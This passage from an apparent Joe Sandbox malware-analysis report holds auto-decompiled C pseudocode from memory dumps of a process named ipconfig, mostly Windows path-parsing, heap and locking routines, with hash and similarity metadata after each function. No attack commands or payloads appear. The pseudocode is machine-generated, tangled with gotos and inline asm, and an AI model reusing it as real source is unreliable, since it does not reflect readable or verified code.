              							__eflags = _t494[2] | _t494[3];
              							if((_t494[2] | _t494[3]) == 0) {
              								goto L15;
              							}
              							goto L12;
              						}
              						__eflags = _t301;
              						if(_t301 != 0) {
              							goto L92;
              						}
              						goto L10;
              						L92:
              						goto L93;
              					}
              				} else {
              					_push(0x57);
              					L101:
              					return E02EED130(_t427, _t494, _t511);
              				}
              			}











































































              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dc1b9571ac6319715af1010d04a49520cc6677ad6d189d0dfbf907065f02c0fa
              • Instruction ID: 2a096f6e0cf13a899a93e15b1ee76fdae79910d3f4ca60478bc0ed50718f6b7b
              • Opcode Fuzzy Hash: dc1b9571ac6319715af1010d04a49520cc6677ad6d189d0dfbf907065f02c0fa
              • Instruction Fuzzy Hash: 99424771E002298FDB24CF68C885BA9B7B5FF49344F1481AADA5DEB342E7349985CF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E02EB4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
              				signed int _v8;
              				void* _v20;
              				signed int _v24;
              				char _v532;
              				char _v540;
              				signed short _v544;
              				signed int _v548;
              				signed short* _v552;
              				signed short _v556;
              				signed short* _v560;
              				signed short* _v564;
              				signed short* _v568;
              				void* _v570;
              				signed short* _v572;
              				signed short _v576;
              				signed int _v580;
              				char _v581;
              				void* _v584;
              				unsigned int _v588;
              				signed short* _v592;
              				void* _v597;
              				void* _v600;
              				void* _v604;
              				void* _v609;
              				void* _v616;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				unsigned int _t161;
              				signed int _t162;
              				unsigned int _t163;
              				void* _t169;
              				signed short _t173;
              				signed short _t177;
              				signed short _t181;
              				unsigned int _t182;
              				signed int _t185;
              				signed int _t213;
              				signed int _t225;
              				short _t233;
              				signed char _t234;
              				signed int _t242;
              				signed int _t243;
              				signed int _t244;
              				signed int _t245;
              				signed int _t250;
              				void* _t251;
              				signed short* _t254;
              				void* _t255;
              				signed int _t256;
              				void* _t257;
              				signed short* _t260;
              				signed short _t265;
              				signed short* _t269;
              				signed short _t271;
              				signed short** _t272;
              				signed short* _t275;
              				signed short _t282;
              				signed short _t283;
              				signed short _t290;
              				signed short _t299;
              				signed short _t307;
              				signed int _t308;
              				signed short _t311;
              				signed short* _t315;
              				signed short _t316;
              				void* _t317;
              				void* _t319;
              				signed short* _t321;
              				void* _t322;
              				void* _t323;
              				unsigned int _t324;
              				signed int _t325;
              				void* _t326;
              				signed int _t327;
              				signed int _t329;
              
              				_t329 = (_t327 & 0xfffffff8) - 0x24c;
              				_v8 =  *0x2f8d360 ^ _t329;
              				_t157 = _a8;
              				_t321 = _a4;
              				_t315 = __edx;
              				_v548 = __ecx;
              				_t305 = _a20;
              				_v560 = _a12;
              				_t260 = _a16;
              				_v564 = __edx;
              				_v580 = _a8;
              				_v572 = _t260;
              				_v544 = _a20;
              				if( *__edx <= 8) {
              					L3:
              					if(_t260 != 0) {
              						 *_t260 = 0;
              					}
              					_t254 =  &_v532;
              					_v588 = 0x208;
              					if((_v548 & 0x00000001) != 0) {
              						_v556 =  *_t315;
              						_v552 = _t315[2];
              						_t161 = E02ECF232( &_v556);
              						_t316 = _v556;
              						_v540 = _t161;
              						goto L17;
              					} else {
              						_t306 = 0x208;
              						_t298 = _t315;
              						_t316 = E02EB6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
              						if(_t316 == 0) {
              							L68:
              							_t322 = 0xc0000033;
              							goto L39;
              						} else {
              							while(_v581 == 0) {
              								_t233 = _v588;
              								if(_t316 > _t233) {
              									_t234 = _v548;
              									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
              										_t254 = L02EB4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
              										if(_t254 == 0) {
              											_t169 = 0xc0000017;
              										} else {
              											_t298 = _v564;
              											_v588 = _t316;
              											_t306 = _t316;
              											_t316 = E02EB6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
              											if(_t316 != 0) {
              												continue;
              											} else {
              												goto L68;
              											}
              										}
              									} else {
              										goto L90;
              									}
              								} else {
              									_v556 = _t316;
              									 *((short*)(_t329 + 0x32)) = _t233;
              									_v552 = _t254;
              									if(_t316 < 2) {
              										L11:
              										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
              											_t161 = 5;
              										} else {
              											if(_t316 < 6) {
              												L87:
              												_t161 = 3;
              											} else {
              												_t242 = _t254[2] & 0x0000ffff;
              												if(_t242 != 0x5c) {
              													if(_t242 == 0x2f) {
              														goto L16;
              													} else {
              														goto L87;
              													}
              													goto L101;
              												} else {
              													L16:
              													_t161 = 2;
              												}
              											}
              										}
              									} else {
              										_t243 =  *_t254 & 0x0000ffff;
              										if(_t243 == 0x5c || _t243 == 0x2f) {
              											if(_t316 < 4) {
              												L81:
              												_t161 = 4;
              												goto L17;
              											} else {
              												_t244 = _t254[1] & 0x0000ffff;
              												if(_t244 != 0x5c) {
              													if(_t244 == 0x2f) {
              														goto L60;
              													} else {
              														goto L81;
              													}
              												} else {
              													L60:
              													if(_t316 < 6) {
              														L83:
              														_t161 = 1;
              														goto L17;
              													} else {
              														_t245 = _t254[2] & 0x0000ffff;
              														if(_t245 != 0x2e) {
              															if(_t245 == 0x3f) {
              																goto L62;
              															} else {
              																goto L83;
              															}
              														} else {
              															L62:
              															if(_t316 < 8) {
              																L85:
              																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
              																goto L17;
              															} else {
              																_t250 = _t254[3] & 0x0000ffff;
              																if(_t250 != 0x5c) {
              																	if(_t250 == 0x2f) {
              																		goto L64;
              																	} else {
              																		goto L85;
              																	}
              																} else {
              																	L64:
              																	_t161 = 6;
              																	goto L17;
              																}
              															}
              														}
              													}
              												}
              											}
              											goto L101;
              										} else {
              											goto L11;
              										}
              									}
              									L17:
              									if(_t161 != 2) {
              										_t162 = _t161 - 1;
              										if(_t162 > 5) {
              											goto L18;
              										} else {
              											switch( *((intOrPtr*)(_t162 * 4 +  &M02EB45F8))) {
              												case 0:
              													_v568 = 0x2e71078;
              													__eax = 2;
              													goto L20;
              												case 1:
              													goto L18;
              												case 2:
              													_t163 = 4;
              													goto L19;
              											}
              										}
              										goto L41;
              									} else {
              										L18:
              										_t163 = 0;
              										L19:
              										_v568 = 0x2e711c4;
              									}
              									L20:
              									_v588 = _t163;
              									_v564 = _t163 + _t163;
              									_t306 =  *_v568 & 0x0000ffff;
              									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
              									_v576 = _t265;
              									if(_t265 > 0xfffe) {
              										L90:
              										_t322 = 0xc0000106;
              									} else {
              										if(_t321 != 0) {
              											if(_t265 > (_t321[1] & 0x0000ffff)) {
              												if(_v580 != 0) {
              													goto L23;
              												} else {
              													_t322 = 0xc0000106;
              													goto L39;
              												}
              											} else {
              												_t177 = _t306;
              												goto L25;
              											}
              											goto L101;
              										} else {
              											if(_v580 == _t321) {
              												_t322 = 0xc000000d;
              											} else {
              												L23:
              												_t173 = L02EB4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
              												_t269 = _v592;
              												_t269[2] = _t173;
              												if(_t173 == 0) {
              													_t322 = 0xc0000017;
              												} else {
              													_t316 = _v556;
              													 *_t269 = 0;
              													_t321 = _t269;
              													_t269[1] = _v576;
              													_t177 =  *_v568 & 0x0000ffff;
              													L25:
              													_v580 = _t177;
              													if(_t177 == 0) {
              														L29:
              														_t307 =  *_t321 & 0x0000ffff;
              													} else {
              														_t290 =  *_t321 & 0x0000ffff;
              														_v576 = _t290;
              														_t310 = _t177 & 0x0000ffff;
              														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
              															_t307 =  *_t321 & 0xffff;
              														} else {
              															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
              															E02EDF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
              															_t329 = _t329 + 0xc;
              															_t311 = _v580;
              															_t225 =  *_t321 + _t311 & 0x0000ffff;
              															 *_t321 = _t225;
              															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
              																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
              															}
              															goto L29;
              														}
              													}
              													_t271 = _v556 - _v588 + _v588;
              													_v580 = _t307;
              													_v576 = _t271;
              													if(_t271 != 0) {
              														_t308 = _t271 & 0x0000ffff;
              														_v588 = _t308;
              														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
              															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
              															E02EDF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
              															_t329 = _t329 + 0xc;
              															_t213 =  *_t321 + _v576 & 0x0000ffff;
              															 *_t321 = _t213;
              															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
              																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
              															}
              														}
              													}
              													_t272 = _v560;
              													if(_t272 != 0) {
              														 *_t272 = _t321;
              													}
              													_t306 = 0;
              													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
              													_t275 = _v572;
              													if(_t275 != 0) {
              														_t306 =  *_t275;
              														if(_t306 != 0) {
              															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
              														}
              													}
              													_t181 = _v544;
              													if(_t181 != 0) {
              														 *_t181 = 0;
              														 *((intOrPtr*)(_t181 + 4)) = 0;
              														 *((intOrPtr*)(_t181 + 8)) = 0;
              														 *((intOrPtr*)(_t181 + 0xc)) = 0;
              														if(_v540 == 5) {
              															_t182 = E02E952A5(1);
              															_v588 = _t182;
              															if(_t182 == 0) {
              																E02EAEB70(1, 0x2f879a0);
              																goto L38;
              															} else {
              																_v560 = _t182 + 0xc;
              																_t185 = E02EAAA20( &_v556, _t182 + 0xc,  &_v556, 1);
              																if(_t185 == 0) {
              																	_t324 = _v588;
              																	goto L97;
              																} else {
              																	_t306 = _v544;
              																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
              																	 *(_t306 + 4) = _t282;
              																	_v576 = _t282;
              																	_t325 = _t316 -  *_v560 & 0x0000ffff;
              																	 *_t306 = _t325;
              																	if( *_t282 == 0x5c) {
              																		_t149 = _t325 - 2; // -2
              																		_t283 = _t149;
              																		 *_t306 = _t283;
              																		 *(_t306 + 4) = _v576 + 2;
              																		_t185 = _t283 & 0x0000ffff;
              																	}
              																	_t324 = _v588;
              																	 *(_t306 + 2) = _t185;
              																	if((_v548 & 0x00000002) == 0) {
              																		L97:
              																		asm("lock xadd [esi], eax");
              																		if((_t185 | 0xffffffff) == 0) {
              																			_push( *((intOrPtr*)(_t324 + 4)));
              																			E02ED95D0();
              																			L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
              																		}
              																	} else {
              																		 *(_t306 + 0xc) = _t324;
              																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
              																	}
              																	goto L38;
              																}
              															}
              															goto L41;
              														}
              													}
              													L38:
              													_t322 = 0;
              												}
              											}
              										}
              									}
              									L39:
              									if(_t254 !=  &_v532) {
              										L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
              									}
              									_t169 = _t322;
              								}
              								goto L41;
              							}
              							goto L68;
              						}
              					}
              					L41:
              					_pop(_t317);
              					_pop(_t323);
              					_pop(_t255);
              					return E02EDB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
              				} else {
              					_t299 = __edx[2];
              					if( *_t299 == 0x5c) {
              						_t256 =  *(_t299 + 2) & 0x0000ffff;
              						if(_t256 != 0x5c) {
              							if(_t256 != 0x3f) {
              								goto L2;
              							} else {
              								goto L50;
              							}
              						} else {
              							L50:
              							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
              								goto L2;
              							} else {
              								_t251 = E02ED3D43(_t315, _t321, _t157, _v560, _v572, _t305);
              								_pop(_t319);
              								_pop(_t326);
              								_pop(_t257);
              								return E02EDB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
              							}
              						}
              					} else {
              						L2:
              						_t260 = _v572;
              						goto L3;
              					}
              				}
              				L101:
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 370acf892b68a564d1f8fb5814d2ff29f7517e044b4d5485285ec76cc61ddca8
              • Instruction ID: 8826226239ac9f4df30158764ebc8698fa97fe3c56e58dd7c46f28a240745bd5
              • Opcode Fuzzy Hash: 370acf892b68a564d1f8fb5814d2ff29f7517e044b4d5485285ec76cc61ddca8
              • Instruction Fuzzy Hash: 6AF16E705482118FC765CF19C490ABBB7E1EF88708F18A92EF58ACB2A1E734D955CB52
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 92%
              			E02EC20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
              				signed int _v16;
              				signed int _v20;
              				signed char _v24;
              				intOrPtr _v28;
              				signed int _v32;
              				void* _v36;
              				char _v48;
              				signed int _v52;
              				signed int _v56;
              				unsigned int _v60;
              				char _v64;
              				unsigned int _v68;
              				signed int _v72;
              				char _v73;
              				signed int _v74;
              				char _v75;
              				signed int _v76;
              				void* _v81;
              				void* _v82;
              				void* _v89;
              				void* _v92;
              				void* _v97;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed char _t128;
              				void* _t129;
              				signed int _t130;
              				void* _t132;
              				signed char _t133;
              				intOrPtr _t135;
              				signed int _t137;
              				signed int _t140;
              				signed int* _t144;
              				signed int* _t145;
              				intOrPtr _t146;
              				signed int _t147;
              				signed char* _t148;
              				signed int _t149;
              				signed int _t153;
              				signed int _t169;
              				signed int _t174;
              				signed int _t180;
              				void* _t197;
              				void* _t198;
              				signed int _t201;
              				intOrPtr* _t202;
              				intOrPtr* _t205;
              				signed int _t210;
              				signed int _t215;
              				signed int _t218;
              				signed char _t221;
              				signed int _t226;
              				char _t227;
              				signed int _t228;
              				void* _t229;
              				unsigned int _t231;
              				void* _t235;
              				signed int _t240;
              				signed int _t241;
              				void* _t242;
              				signed int _t246;
              				signed int _t248;
              				signed int _t252;
              				signed int _t253;
              				void* _t254;
              				intOrPtr* _t256;
              				intOrPtr _t257;
              				unsigned int _t262;
              				signed int _t265;
              				void* _t267;
              				signed int _t275;
              
              				_t198 = __ebx;
              				_t267 = (_t265 & 0xfffffff0) - 0x48;
              				_v68 = __ecx;
              				_v73 = 0;
              				_t201 = __edx & 0x00002000;
              				_t128 = __edx & 0xffffdfff;
              				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
              				_v72 = _t128;
              				if((_t128 & 0x00000008) != 0) {
              					__eflags = _t128 - 8;
              					if(_t128 != 8) {
              						L69:
              						_t129 = 0xc000000d;
              						goto L23;
              					} else {
              						_t130 = 0;
              						_v72 = 0;
              						_v75 = 1;
              						L2:
              						_v74 = 1;
              						_t226 =  *0x2f88714; // 0x0
              						if(_t226 != 0) {
              							__eflags = _t201;
              							if(_t201 != 0) {
              								L62:
              								_v74 = 1;
              								L63:
              								_t130 = _t226 & 0xffffdfff;
              								_v72 = _t130;
              								goto L3;
              							}
              							_v74 = _t201;
              							__eflags = _t226 & 0x00002000;
              							if((_t226 & 0x00002000) == 0) {
              								goto L63;
              							}
              							goto L62;
              						}
              						L3:
              						_t227 = _v75;
              						L4:
              						_t240 = 0;
              						_v56 = 0;
              						_t252 = _t130 & 0x00000100;
              						if(_t252 != 0 || _t227 != 0) {
              							_t240 = _v68;
              							_t132 = E02EC2EB0(_t240);
              							__eflags = _t132 - 2;
              							if(_t132 != 2) {
              								__eflags = _t132 - 1;
              								if(_t132 == 1) {
              									goto L25;
              								}
              								__eflags = _t132 - 6;
              								if(_t132 == 6) {
              									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
              									if( *((short*)(_t240 + 4)) != 0x3f) {
              										goto L40;
              									}
              									_t197 = E02EC2EB0(_t240 + 8);
              									__eflags = _t197 - 2;
              									if(_t197 == 2) {
              										goto L25;
              									}
              								}
              								L40:
              								_t133 = 1;
              								L26:
              								_t228 = _v75;
              								_v56 = _t240;
              								__eflags = _t133;
              								if(_t133 != 0) {
              									__eflags = _t228;
              									if(_t228 == 0) {
              										L43:
              										__eflags = _v72;
              										if(_v72 == 0) {
              											goto L8;
              										}
              										goto L69;
              									}
              									_t133 = E02E958EC(_t240);
              									_t221 =  *0x2f85cac; // 0x16
              									__eflags = _t221 & 0x00000040;
              									if((_t221 & 0x00000040) != 0) {
              										_t228 = 0;
              										__eflags = _t252;
              										if(_t252 != 0) {
              											goto L43;
              										}
              										_t133 = _v72;
              										goto L7;
              									}
              									goto L43;
              								} else {
              									_t133 = _v72;
              									goto L6;
              								}
              							}
              							L25:
              							_t133 = _v73;
              							goto L26;
              						} else {
              							L6:
              							_t221 =  *0x2f85cac; // 0x16
              							L7:
              							if(_t133 != 0) {
              								__eflags = _t133 & 0x00001000;
              								if((_t133 & 0x00001000) != 0) {
              									_t133 = _t133 | 0x00000a00;
              									__eflags = _t221 & 0x00000004;
              									if((_t221 & 0x00000004) != 0) {
              										_t133 = _t133 | 0x00000400;
              									}
              								}
              								__eflags = _t228;
              								if(_t228 != 0) {
              									_t133 = _t133 | 0x00000100;
              								}
              								_t229 = E02ED4A2C(0x2f86e40, 0x2ed4b30, _t133, _t240);
              								__eflags = _t229;
              								if(_t229 == 0) {
              									_t202 = _a20;
              									goto L100;
              								} else {
              									_t135 =  *((intOrPtr*)(_t229 + 0x38));
              									L15:
              									_t202 = _a20;
              									 *_t202 = _t135;
              									if(_t229 == 0) {
              										L100:
              										 *_a4 = 0;
              										_t137 = _a8;
              										__eflags = _t137;
              										if(_t137 != 0) {
              											 *_t137 = 0;
              										}
              										 *_t202 = 0;
              										_t129 = 0xc0000017;
              										goto L23;
              									} else {
              										_t242 = _a16;
              										if(_t242 != 0) {
              											_t254 = _t229;
              											memcpy(_t242, _t254, 0xd << 2);
              											_t267 = _t267 + 0xc;
              											_t242 = _t254 + 0x1a;
              										}
              										_t205 = _a4;
              										_t25 = _t229 + 0x48; // 0x48
              										 *_t205 = _t25;
              										_t140 = _a8;
              										if(_t140 != 0) {
              											__eflags =  *((char*)(_t267 + 0xa));
              											if( *((char*)(_t267 + 0xa)) != 0) {
              												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
              											} else {
              												 *_t140 = 0;
              											}
              										}
              										_t256 = _a12;
              										if(_t256 != 0) {
              											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
              										}
              										_t257 =  *_t205;
              										_v48 = 0;
              										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
              										_v56 = 0;
              										_v52 = 0;
              										_t144 =  *( *[fs:0x30] + 0x50);
              										if(_t144 != 0) {
              											__eflags =  *_t144;
              											if( *_t144 == 0) {
              												goto L20;
              											}
              											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
              											goto L21;
              										} else {
              											L20:
              											_t145 = 0x7ffe0384;
              											L21:
              											if( *_t145 != 0) {
              												_t146 =  *[fs:0x30];
              												__eflags =  *(_t146 + 0x240) & 0x00000004;
              												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
              													_t147 = E02EB7D50();
              													__eflags = _t147;
              													if(_t147 == 0) {
              														_t148 = 0x7ffe0385;
              													} else {
              														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
              													}
              													__eflags =  *_t148 & 0x00000020;
              													if(( *_t148 & 0x00000020) != 0) {
              														_t149 = _v72;
              														__eflags = _t149;
              														if(__eflags == 0) {
              															_t149 = 0x2e75c80;
              														}
              														_push(_t149);
              														_push( &_v48);
              														 *((char*)(_t267 + 0xb)) = E02ECF6E0(_t198, _t242, _t257, __eflags);
              														_push(_t257);
              														_push( &_v64);
              														_t153 = E02ECF6E0(_t198, _t242, _t257, __eflags);
              														__eflags =  *((char*)(_t267 + 0xb));
              														if( *((char*)(_t267 + 0xb)) != 0) {
              															__eflags = _t153;
              															if(_t153 != 0) {
              																__eflags = 0;
              																E02F17016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
              																L02EB2400(_t267 + 0x20);
              															}
              															L02EB2400( &_v64);
              														}
              													}
              												}
              											}
              											_t129 = 0;
              											L23:
              											return _t129;
              										}
              									}
              								}
              							}
              							L8:
              							_t275 = _t240;
              							if(_t275 != 0) {
              								_v73 = 0;
              								_t253 = 0;
              								__eflags = 0;
              								L29:
              								_push(0);
              								_t241 = E02EC2397(_t240);
              								__eflags = _t241;
              								if(_t241 == 0) {
              									_t229 = 0;
              									L14:
              									_t135 = 0;
              									goto L15;
              								}
              								__eflags =  *((char*)(_t267 + 0xb));
              								 *(_t241 + 0x34) = 1;
              								if( *((char*)(_t267 + 0xb)) != 0) {
              									E02EB2280(_t134, 0x2f88608);
              									__eflags =  *0x2f86e48 - _t253; // 0x408870
              									if(__eflags != 0) {
              										L48:
              										_t253 = 0;
              										__eflags = 0;
              										L49:
              										E02EAFFB0(_t198, _t241, 0x2f88608);
              										__eflags = _t253;
              										if(_t253 != 0) {
              											L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
              										}
              										goto L31;
              									}
              									 *0x2f86e48 = _t241;
              									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
              									__eflags = _t253;
              									if(_t253 != 0) {
              										_t57 = _t253 + 0x34;
              										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
              										__eflags =  *_t57;
              										if( *_t57 == 0) {
              											goto L49;
              										}
              									}
              									goto L48;
              								}
              								L31:
              								_t229 = _t241;
              								goto L14;
              							}
              							_v73 = 1;
              							_v64 = _t240;
              							asm("lock bts dword [esi], 0x0");
              							if(_t275 < 0) {
              								_t231 =  *0x2f88608; // 0x0
              								while(1) {
              									_v60 = _t231;
              									__eflags = _t231 & 0x00000001;
              									if((_t231 & 0x00000001) != 0) {
              										goto L76;
              									}
              									_t73 = _t231 + 1; // 0x1
              									_t210 = _t73;
              									asm("lock cmpxchg [edi], ecx");
              									__eflags = _t231 - _t231;
              									if(_t231 != _t231) {
              										L92:
              										_t133 = E02EC6B90(_t210,  &_v64);
              										_t262 =  *0x2f88608; // 0x0
              										L93:
              										_t231 = _t262;
              										continue;
              									}
              									_t240 = _v56;
              									goto L10;
              									L76:
              									_t169 = E02ECE180(_t133);
              									__eflags = _t169;
              									if(_t169 != 0) {
              										_push(0xc000004b);
              										_push(0xffffffff);
              										E02ED97C0();
              										_t231 = _v68;
              									}
              									_v72 = 0;
              									_v24 =  *( *[fs:0x18] + 0x24);
              									_v16 = 3;
              									_v28 = 0;
              									__eflags = _t231 & 0x00000002;
              									if((_t231 & 0x00000002) == 0) {
              										_v32 =  &_v36;
              										_t174 = _t231 >> 4;
              										__eflags = 1 - _t174;
              										_v20 = _t174;
              										asm("sbb ecx, ecx");
              										_t210 = 3 |  &_v36;
              										__eflags = _t174;
              										if(_t174 == 0) {
              											_v20 = 0xfffffffe;
              										}
              									} else {
              										_v32 = 0;
              										_v20 = 0xffffffff;
              										_v36 = _t231 & 0xfffffff0;
              										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
              										_v72 =  !(_t231 >> 2) & 0xffffff01;
              									}
              									asm("lock cmpxchg [edi], esi");
              									_t262 = _t231;
              									__eflags = _t262 - _t231;
              									if(_t262 != _t231) {
              										goto L92;
              									} else {
              										__eflags = _v72;
              										if(_v72 != 0) {
              											E02ED006A(0x2f88608, _t210);
              										}
              										__eflags =  *0x7ffe036a - 1;
              										if(__eflags <= 0) {
              											L89:
              											_t133 =  &_v16;
              											asm("lock btr dword [eax], 0x1");
              											if(__eflags >= 0) {
              												goto L93;
              											} else {
              												goto L90;
              											}
              											do {
              												L90:
              												_push(0);
              												_push(0x2f88608);
              												E02EDB180();
              												_t133 = _v24;
              												__eflags = _t133 & 0x00000004;
              											} while ((_t133 & 0x00000004) == 0);
              											goto L93;
              										} else {
              											_t218 =  *0x2f86904; // 0x400
              											__eflags = _t218;
              											if(__eflags == 0) {
              												goto L89;
              											} else {
              												goto L87;
              											}
              											while(1) {
              												L87:
              												__eflags = _v16 & 0x00000002;
              												if(__eflags == 0) {
              													goto L89;
              												}
              												asm("pause");
              												_t218 = _t218 - 1;
              												__eflags = _t218;
              												if(__eflags != 0) {
              													continue;
              												}
              												goto L89;
              											}
              											goto L89;
              										}
              									}
              								}
              							}
              							L10:
              							_t229 =  *0x2f86e48; // 0x408870
              							_v72 = _t229;
              							if(_t229 == 0) {
              								L45:
              								E02EAFFB0(_t198, _t240, 0x2f88608);
              								_t253 = _v76;
              								goto L29;
              							}
              							if( *((char*)(_t229 + 0x40)) != 0) {
              								L13:
              								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
              								asm("lock cmpxchg [esi], ecx");
              								_t215 = 1;
              								if(1 != 1) {
              									while(1) {
              										_t246 = _t215 & 0x00000006;
              										_t180 = _t215;
              										__eflags = _t246 - 2;
              										_v56 = _t246;
              										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
              										asm("lock cmpxchg [edi], esi");
              										_t248 = _v56;
              										__eflags = _t180 - _t215;
              										if(_t180 == _t215) {
              											break;
              										}
              										_t215 = _t180;
              									}
              									__eflags = _t248 - 2;
              									if(_t248 == 2) {
              										__eflags = 0;
              										E02ED00C2(0x2f88608, 0, _t235);
              									}
              									_t229 = _v72;
              								}
              								goto L14;
              							}
              							_t18 = _t229 + 0x38; // 0x8
              							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
              								goto L45;
              							}
              							goto L13;
              						}
              					}
              				}
              				_t227 = 0;
              				_v75 = 0;
              				if(_t128 != 0) {
              					goto L4;
              				}
              				goto L2;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4840e402d36365dffb039e369880eaf2b443e50c79a46701eb36c2b75358a9ba
              • Instruction ID: 92e3086d7a8aa763224d4d147c4683598c2d126d5e19c594cbed42d458db14aa
              • Opcode Fuzzy Hash: 4840e402d36365dffb039e369880eaf2b443e50c79a46701eb36c2b75358a9ba
              • Instruction Fuzzy Hash: BBF10431A483019FDB25CB68C98076AB7E1BF85398F14D51DEE999B380D774D842CF92
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E02EAD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
              				signed int _v8;
              				intOrPtr _v20;
              				signed int _v36;
              				intOrPtr* _v40;
              				signed int _v44;
              				signed int _v48;
              				signed char _v52;
              				signed int _v60;
              				signed int _v64;
              				signed int _v68;
              				signed int _v72;
              				signed int _v76;
              				intOrPtr _v80;
              				signed int _v84;
              				intOrPtr _v100;
              				intOrPtr _v104;
              				signed int _v108;
              				signed int _v112;
              				signed int _v116;
              				intOrPtr _v120;
              				signed int _v132;
              				char _v140;
              				char _v144;
              				char _v157;
              				signed int _v164;
              				signed int _v168;
              				signed int _v169;
              				intOrPtr _v176;
              				signed int _v180;
              				intOrPtr _v184;
              				intOrPtr _v188;
              				signed int _v192;
              				signed int _v200;
              				signed int _v208;
              				intOrPtr* _v212;
              				char _v216;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed int _t204;
              				signed int _t206;
              				void* _t208;
              				signed int _t211;
              				signed int _t216;
              				intOrPtr _t217;
              				intOrPtr* _t218;
              				signed int _t226;
              				signed int _t239;
              				signed int* _t247;
              				signed int _t249;
              				void* _t252;
              				signed int _t256;
              				signed int _t269;
              				signed int _t271;
              				signed int _t277;
              				intOrPtr _t279;
              				intOrPtr _t283;
              				signed int _t287;
              				signed int _t288;
              				void* _t289;
              				signed char _t290;
              				signed int _t292;
              				signed int* _t293;
